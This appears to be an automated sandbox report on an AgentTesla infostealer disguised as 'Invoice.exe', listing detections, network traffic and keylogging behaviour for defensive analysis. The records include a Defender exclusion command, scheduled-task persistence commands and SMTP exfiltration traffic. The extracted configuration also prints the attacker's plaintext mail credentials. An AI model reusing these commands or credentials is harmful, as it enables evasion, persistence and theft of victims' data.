Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\kaJNzBnxbXm" /XML "C:\Users\user\AppData\Local\Temp\tmpB8B1.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\kaJNzBnxbXm" /XML "C:\Users\user\AppData\Local\Temp\tmpB8B1.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe, ParentImage: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe, ParentProcessId: 7496, ParentProcessName: kaJNzBnxbXm.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\kaJNzBnxbXm" /XML "C:\Users\user\AppData\Local\Temp\tmpB8B1.tmp", ProcessId: 7736, ProcessName: schtasks.exe

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

Author: frack113: Data: DestinationIp: 207.174.215.249, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\Invoice.exe, Initiated: true, ProcessId: 7396, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49735

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\kaJNzBnxbXm" /XML "C:\Users\user\AppData\Local\Temp\tmpA865.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\kaJNzBnxbXm" /XML "C:\Users\user\AppData\Local\Temp\tmpA865.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Invoice.exe", ParentImage: C:\Users\user\Desktop\Invoice.exe, ParentProcessId: 6428, ParentProcessName: Invoice.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\kaJNzBnxbXm" /XML "C:\Users\user\AppData\Local\Temp\tmpA865.tmp", ProcessId: 7216, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Invoice.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Invoice.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Invoice.exe", ParentImage: C:\Users\user\Desktop\Invoice.exe, ParentProcessId: 6428, ParentProcessName: Invoice.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Invoice.exe", ProcessId: 5888, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\kaJNzBnxbXm" /XML "C:\Users\user\AppData\Local\Temp\tmpA865.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\kaJNzBnxbXm" /XML "C:\Users\user\AppData\Local\Temp\tmpA865.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Invoice.exe", ParentImage: C:\Users\user\Desktop\Invoice.exe, ParentProcessId: 6428, ParentProcessName: Invoice.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\kaJNzBnxbXm" /XML "C:\Users\user\AppData\Local\Temp\tmpA865.tmp", ProcessId: 7216, ProcessName: schtasks.exe

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Invoice.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Avira: detection malicious, Label: HEUR/AGEN.1309753
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Avira: detection malicious, Label: HEUR/AGEN.1309753

Found malware configuration

Source: 20.2.BjTxJte.exe.400000.0.unpack

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.starmech.net", "Username": "electronics@starmech.net", "Password": "nics123"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Virustotal: Detection: 42%	Perma Link
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Virustotal: Detection: 42%	Perma Link

Multi AV Scanner detection for submitted file

Source: Invoice.exe	ReversingLabs: Detection: 50%
Source: Invoice.exe	Virustotal: Detection: 30%			Perma Link

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: Invoice.exe

Joe Sandbox ML: detected

Source: Invoice.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49747 version: TLS 1.2

Source: Invoice.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Networking

Yara detected Generic Downloader

Source: Yara match	File source: 0.2.Invoice.exe.4a4f1f0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Invoice.exe.4acba10.4.raw.unpack, type: UNPACKEDPE

Source: global traffic

TCP traffic: 192.168.2.4:49735 -> 207.174.215.249:587

Source: Joe Sandbox View	IP Address: 104.26.12.205 104.26.12.205
Source: Joe Sandbox View	IP Address: 207.174.215.249 207.174.215.249
Source: Joe Sandbox View	IP Address: 104.26.13.205 104.26.13.205
Source: Joe Sandbox View	IP Address: 104.26.13.205 104.26.13.205

Source: Joe Sandbox View

ASN Name: PUBLIC-DOMAIN-REGISTRYUS PUBLIC-DOMAIN-REGISTRYUS

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org

Source: global traffic

TCP traffic: 192.168.2.4:49735 -> 207.174.215.249:587

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: api.ipify.org
Source: global traffic	DNS traffic detected: DNS query: mail.starmech.net

Source: Invoice.exe, 0000000A.00000002.4154310279.0000000002A1B000.00000004.00000800.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4154310279.0000000002C09000.00000004.00000800.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4154310279.0000000002CAD000.00000004.00000800.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4154310279.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4154310279.0000000002AEA000.00000004.00000800.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4154310279.0000000002A96000.00000004.00000800.00020000.00000000.sdmp, kaJNzBnxbXm.exe, 0000000F.00000002.4154923475.00000000031B4000.00000004.00000800.00020000.00000000.sdmp, kaJNzBnxbXm.exe, 0000000F.00000002.4154923475.0000000003305000.00000004.00000800.00020000.00000000.sdmp, kaJNzBnxbXm.exe, 0000000F.00000002.4154923475.00000000033B0000.00000004.00000800.00020000.00000000.sdmp, kaJNzBnxbXm.exe, 0000000F.00000002.4154923475.0000000003261000.00000004.00000800.00020000.00000000.sdmp, kaJNzBnxbXm.exe, 0000000F.00000002.4154923475.000000000318B000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000014.00000002.1937601550.0000000002C3C000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 0000001B.00000002.4153454103.000000000304B000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 0000001B.00000002.4153454103.0000000002FFE000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 0000001B.00000002.4153454103.000000000314E000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 0000001B.00000002.4153454103.0000000003191000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 0000001B.00000002.4153454103.0000000002FDC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mail.starmech.net
Source: Invoice.exe, 0000000A.00000002.4154310279.0000000002A1B000.00000004.00000800.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4154310279.00000000029D8000.00000004.00000800.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4147057049.0000000000BD2000.00000004.00000020.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4154310279.0000000002C09000.00000004.00000800.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4154310279.0000000002CAD000.00000004.00000800.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4154310279.000000000294E000.00000004.00000800.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4199902924.0000000008B2E000.00000004.00000020.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4190838162.00000000061DD000.00000004.00000020.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4154310279.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4192476931.0000000006202000.00000004.00000020.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4154310279.00000000028DB000.00000004.00000800.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4192868492.000000000621A000.00000004.00000020.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4201720311.0000000008B86000.00000004.00000020.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4150251612.0000000000C2B000.00000004.00000020.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4154310279.0000000002AEA000.00000004.00000800.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4193252475.000000000622C000.00000004.00000020.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4154310279.0000000002A96000.00000004.00000800.00020000.00000000.sdmp, kaJNzBnxbXm.exe, 0000000F.00000002.4216968494.0000000007EB6000.00000004.00000020.00020000.00000000.sdmp, kaJNzBnxbXm.exe, 0000000F.00000002.4148031273.00000000014C9000.00000004.00000020.00020000.00000000.sdmp, kaJNzBnxbXm.exe, 0000000F.00000002.4148031273.0000000001483000.00000004.00000020.00020000.00000000.sdmp, kaJNzBnxbXm.exe, 0000000F.00000002.4191864782.0000000006897000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://r3.i.lencr.org/0W
Source: Invoice.exe, 0000000A.00000002.4154310279.0000000002A1B000.00000004.00000800.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4154310279.00000000029D8000.00000004.00000800.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4147057049.0000000000BD2000.00000004.00000020.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4154310279.0000000002C09000.00000004.00000800.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4154310279.0000000002CAD000.00000004.00000800.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4154310279.000000000294E000.00000004.00000800.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4199902924.0000000008B2E000.00000004.00000020.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4190838162.00000000061DD000.00000004.00000020.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4154310279.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4192476931.0000000006202000.00000004.00000020.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4154310279.00000000028DB000.00000004.00000800.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4192868492.000000000621A000.00000004.00000020.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4201720311.0000000008B86000.00000004.00000020.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4150251612.0000000000C2B000.00000004.00000020.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4154310279.0000000002AEA000.00000004.00000800.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4193252475.000000000622C000.00000004.00000020.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4154310279.0000000002A96000.00000004.00000800.00020000.00000000.sdmp, kaJNzBnxbXm.exe, 0000000F.00000002.4216968494.0000000007EB6000.00000004.00000020.00020000.00000000.sdmp, kaJNzBnxbXm.exe, 0000000F.00000002.4148031273.00000000014C9000.00000004.00000020.00020000.00000000.sdmp, kaJNzBnxbXm.exe, 0000000F.00000002.4148031273.0000000001483000.00000004.00000020.00020000.00000000.sdmp, kaJNzBnxbXm.exe, 0000000F.00000002.4191864782.0000000006897000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://r3.o.lencr.org0
Source: Invoice.exe, 00000000.00000002.1709720176.00000000030E6000.00000004.00000800.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4154310279.0000000002891000.00000004.00000800.00020000.00000000.sdmp, kaJNzBnxbXm.exe, 0000000B.00000002.1752157316.00000000026E6000.00000004.00000800.00020000.00000000.sdmp, kaJNzBnxbXm.exe, 0000000F.00000002.4154923475.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000010.00000002.1855539438.0000000002526000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000014.00000002.1937601550.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000018.00000002.1936751210.0000000003196000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 0000001B.00000002.4153454103.0000000002F6C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Invoice.exe, 00000000.00000002.1723086091.0000000007042000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: Invoice.exe, 00000000.00000002.1723086091.0000000007042000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: Invoice.exe, 00000000.00000002.1723086091.0000000007042000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: Invoice.exe, 00000000.00000002.1723086091.0000000007042000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: Invoice.exe, 00000000.00000002.1723086091.0000000007042000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: Invoice.exe, 00000000.00000002.1723086091.0000000007042000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: Invoice.exe, 00000000.00000002.1723086091.0000000007042000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: Invoice.exe, 00000000.00000002.1723086091.0000000007042000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: Invoice.exe, 00000000.00000002.1723086091.0000000007042000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: Invoice.exe, 00000000.00000002.1723086091.0000000007042000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: Invoice.exe, 00000000.00000002.1723086091.0000000007042000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: Invoice.exe, 00000000.00000002.1723086091.0000000007042000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: Invoice.exe, 00000000.00000002.1723086091.0000000007042000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: Invoice.exe, 00000000.00000002.1723086091.0000000007042000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: Invoice.exe, 00000000.00000002.1723086091.0000000007042000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: Invoice.exe, 00000000.00000002.1723086091.0000000007042000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: Invoice.exe, 00000000.00000002.1723086091.0000000007042000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: Invoice.exe, 00000000.00000002.1723086091.0000000007042000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: Invoice.exe, 00000000.00000002.1723086091.0000000007042000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: Invoice.exe, 00000000.00000002.1723003703.0000000005940000.00000004.00000020.00020000.00000000.sdmp, Invoice.exe, 00000000.00000002.1723086091.0000000007042000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: Invoice.exe, 00000000.00000002.1723086091.0000000007042000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: Invoice.exe, 00000000.00000002.1723086091.0000000007042000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: Invoice.exe, 00000000.00000002.1723086091.0000000007042000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: Invoice.exe, 00000000.00000002.1723086091.0000000007042000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: Invoice.exe, 00000000.00000002.1723086091.0000000007042000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: Invoice.exe, 0000000A.00000002.4199556511.0000000008B1E000.00000004.00000020.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4154310279.0000000002A1B000.00000004.00000800.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4147057049.0000000000BD2000.00000004.00000020.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4149271573.0000000000BE7000.00000004.00000020.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4154310279.0000000002C09000.00000004.00000800.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4154310279.0000000002CAD000.00000004.00000800.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4154310279.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4192615676.000000000620B000.00000004.00000020.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4192868492.000000000621A000.00000004.00000020.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4201720311.0000000008B86000.00000004.00000020.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4150251612.0000000000C2B000.00000004.00000020.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4154310279.0000000002AEA000.00000004.00000800.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4193252475.000000000622C000.00000004.00000020.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4154310279.0000000002A96000.00000004.00000800.00020000.00000000.sdmp, kaJNzBnxbXm.exe, 0000000F.00000002.4216968494.0000000007EB6000.00000004.00000020.00020000.00000000.sdmp, kaJNzBnxbXm.exe, 0000000F.00000002.4148031273.00000000014C9000.00000004.00000020.00020000.00000000.sdmp, kaJNzBnxbXm.exe, 0000000F.00000002.4191864782.0000000006897000.00000004.00000020.00020000.00000000.sdmp, kaJNzBnxbXm.exe, 0000000F.00000002.4154923475.00000000031B4000.00000004.00000800.00020000.00000000.sdmp, kaJNzBnxbXm.exe, 0000000F.00000002.4154923475.0000000003305000.00000004.00000800.00020000.00000000.sdmp, kaJNzBnxbXm.exe, 0000000F.00000002.4154923475.00000000033B0000.00000004.00000800.00020000.00000000.sdmp, kaJNzBnxbXm.exe, 0000000F.00000002.4154923475.0000000003261000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: Invoice.exe, 0000000A.00000002.4199556511.0000000008B1E000.00000004.00000020.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4154310279.0000000002A1B000.00000004.00000800.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4147057049.0000000000BD2000.00000004.00000020.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4149271573.0000000000BE7000.00000004.00000020.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4154310279.0000000002C09000.00000004.00000800.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4154310279.0000000002CAD000.00000004.00000800.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4154310279.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4192615676.000000000620B000.00000004.00000020.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4201720311.0000000008B86000.00000004.00000020.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4150251612.0000000000C2B000.00000004.00000020.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4154310279.0000000002AEA000.00000004.00000800.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4193252475.000000000622C000.00000004.00000020.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4154310279.0000000002A96000.00000004.00000800.00020000.00000000.sdmp, kaJNzBnxbXm.exe, 0000000F.00000002.4216968494.0000000007EB6000.00000004.00000020.00020000.00000000.sdmp, kaJNzBnxbXm.exe, 0000000F.00000002.4148031273.00000000014C9000.00000004.00000020.00020000.00000000.sdmp, kaJNzBnxbXm.exe, 0000000F.00000002.4191864782.0000000006897000.00000004.00000020.00020000.00000000.sdmp, kaJNzBnxbXm.exe, 0000000F.00000002.4154923475.00000000031B4000.00000004.00000800.00020000.00000000.sdmp, kaJNzBnxbXm.exe, 0000000F.00000002.4154923475.0000000003305000.00000004.00000800.00020000.00000000.sdmp, kaJNzBnxbXm.exe, 0000000F.00000002.4154923475.00000000033B0000.00000004.00000800.00020000.00000000.sdmp, kaJNzBnxbXm.exe, 0000000F.00000002.4154923475.0000000003261000.00000004.00000800.00020000.00000000.sdmp, kaJNzBnxbXm.exe, 0000000F.00000002.4216968494.0000000007E80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: Invoice.exe, 00000000.00000002.1711744311.0000000004847000.00000004.00000800.00020000.00000000.sdmp, kaJNzBnxbXm.exe, 0000000B.00000002.1756637194.00000000040EE000.00000004.00000800.00020000.00000000.sdmp, kaJNzBnxbXm.exe, 0000000B.00000002.1756637194.000000000426F000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000014.00000002.1933061893.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://account.dyn.com/
Source: Invoice.exe, 00000000.00000002.1711744311.0000000004847000.00000004.00000800.00020000.00000000.sdmp, Invoice.exe, 0000000A.00000002.4154310279.0000000002891000.00000004.00000800.00020000.00000000.sdmp, kaJNzBnxbXm.exe, 0000000B.00000002.1756637194.00000000040EE000.00000004.00000800.00020000.00000000.sdmp, kaJNzBnxbXm.exe, 0000000B.00000002.1756637194.000000000426F000.00000004.00000800.00020000.00000000.sdmp, kaJNzBnxbXm.exe, 0000000F.00000002.4154923475.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000014.00000002.1937601550.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000014.00000002.1933061893.0000000000402000.00000040.00000400.00020000.00000000.sdmp, BjTxJte.exe, 0000001B.00000002.4153454103.0000000002F6C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org
Source: kaJNzBnxbXm.exe, 0000000F.00000002.4154923475.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000014.00000002.1937601550.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 0000001B.00000002.4153454103.0000000002F6C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/
Source: kaJNzBnxbXm.exe, 0000000F.00000002.4154923475.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000014.00000002.1937601550.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 0000001B.00000002.4153454103.0000000002F6C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/t

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443

Source: unknown	HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49747 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to log keystrokes (.Net Source)

Source: 0.2.Invoice.exe.4b48230.5.raw.unpack, cPKWk.cs

.Net Code: BFizZFdmpI1

Installs a global keyboard hook

Source: C:\Users\user\Desktop\Invoice.exe	Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\Invoice.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe
